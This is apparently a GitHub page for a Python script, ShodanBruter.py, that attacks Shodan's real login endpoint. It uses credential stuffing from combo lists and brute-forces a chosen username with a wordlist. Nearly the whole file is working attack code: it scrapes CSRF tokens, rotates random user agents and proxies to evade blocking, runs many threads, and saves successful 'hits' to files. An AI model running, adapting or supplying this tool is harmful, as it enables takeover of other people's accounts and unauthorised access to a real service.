-
Notifications
You must be signed in to change notification settings - Fork 1
/
ShodanBruter.py
169 lines (142 loc) · 5.61 KB
/
ShodanBruter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
import requests
from bs4 import BeautifulSoup
import datetime
import os.path
import threading
import easygui
import random
from fake_useragent import UserAgent
ua = UserAgent()
user_agent = ua.random
now = datetime.datetime.now()
date_str = now.strftime('%Y-%m-%d')
good = f'Good_{date_str}.txt'
bad = f'Bad_{date_str}.txt'
session = requests.session()
headers = {
'User-Agent': user_agent,
'Pragma': 'no-cache',
'Accept': '*/*',
}
def banner():
print("""
_________.__ .___ __________ __
/ _____/| |__ ____ __| _/____ ____ \______ \_______ __ ___/ |_ ___________
\_____ \ | | \ / _ \ / __ |\__ \ / \ ______ | | _/\_ __ \ | \ __\/ __ \_ __ \
/ \| Y ( <_> ) /_/ | / __ \| | \ /_____/ | | \ | | \/ | /| | \ ___/| | \/
/_______ /|___| /\____/\____ |(____ /___| / |______ / |__| |____/ |__| \___ >__|
\/ \/ \/ \/ \/ \/ \/
By theattacker
github:https://github.com/TheNewAttacker64/
""")
if os.path.exists("Results") == False:
os.mkdir("Results")
os.chdir("Results")
def get_proxy():
proxy_file = easygui.fileopenbox("Select Proxy File")
proxies = []
if os.path.exists(proxy_file):
with open(proxy_file, 'r') as f:
for line in f:
line = line.strip()
if line:
proxies.append({'https': line})
return proxies
def GenFiles():
with open(good, 'w') as f:
pass
with open(bad, 'w') as a:
pass
def login(username, password,proxy,proxies):
try:
chosen = []
if proxy == False:
csrfparse = session.get("https://account.shodan.io/login", headers=headers, allow_redirects=True).text
else:
chosen = random.choice(proxies)
csrfparse = session.get("https://account.shodan.io/login", headers=headers, allow_redirects=True,
proxies=chosen,timeout=1).text
soup = BeautifulSoup(csrfparse, 'html.parser')
csrf_input = soup.find('input', {'name': 'csrf_token'})
if csrf_input:
csrf_token = csrf_input['value']
data = "username=" + username + "&password=" + password + "&grant_type=password&continue=http%3A%2F%2Fwww.shodan.io%2Fdashboard&csrf_token=" + csrf_token
if proxy == False:
loginrequest = session.post("https://account.shodan.io/login", headers=headers, data=data)
else:
loginrequest = session.post("https://account.shodan.io/login", headers=headers, data=data,
proxies=chosen, timeout=1)
if "Invalid username or password" in loginrequest.text:
print("[-] Bad Cred " + username + ":" + password)
with open(bad, 'a') as Bad:
Bad.write(username + ":" + password + "\n")
elif "Dashboard" in loginrequest.text:
print("[+] Hit " + username + ":" + password)
with open(good, 'a') as hits:
hits.write(username + ":" + password + "\n")
return True
else:
print("Wierd Response Use Proxy")
if proxy == True:
print("Trying again with another proxy")
login(username, password,proxy,proxies)
except OSError:
print("Check your proxies will try using other proxies from the list")
login(username, password, proxy, proxies)
def main():
banner()
pr = None
proxies = []
print("""
1) Shodan Mass Bruter Combo Format User:Pass
2) Brute 1 Account 1 Username
""")
options = int(input("Choose An Option:"))
if options == 1:
proxy = input("Are you going to use Proxy Y/N:").upper()
if proxy == 'Y':
pr = True
proxies = get_proxy()
elif proxy == "N":
pr = False
else:
print("Invalid Choice")
combo = easygui.fileopenbox("Combo File Cred User:Pass")
Threadsm = int(input("How Much threads do you want:"))
threads = []
with open(combo,'r') as com:
for i in com:
par = i.rstrip('\n')
cred = par.split(":")
user = cred[0]
password = cred[1]
thread = threading.Thread(target=login, args=(user, password, pr,proxies))
threads.append(thread)
print("[*] Starting All Threads")
try:
for i in range(Threadsm):
threads[i].start()
for thread in threads:
thread.join()
except:
pass
elif options == 2:
username = input("Enter The Username you Want to attack:")
wordlist = easygui.fileopenbox("Select your Wordlist for the Attack")
proxy = input("Do you Want to Use proxy Y/N:").upper()
if proxy == 'Y':
pr = True
proxies = get_proxy()
elif proxy == 'N':
pr = False
else:
print("Invalid Choice")
with open(wordlist, 'r') as com:
for i in com:
password = i.rstrip('\n')
if login(username, password, pr, proxies) == True:
print("[+] Congrats Password Found", password)
break
else:
main()
main()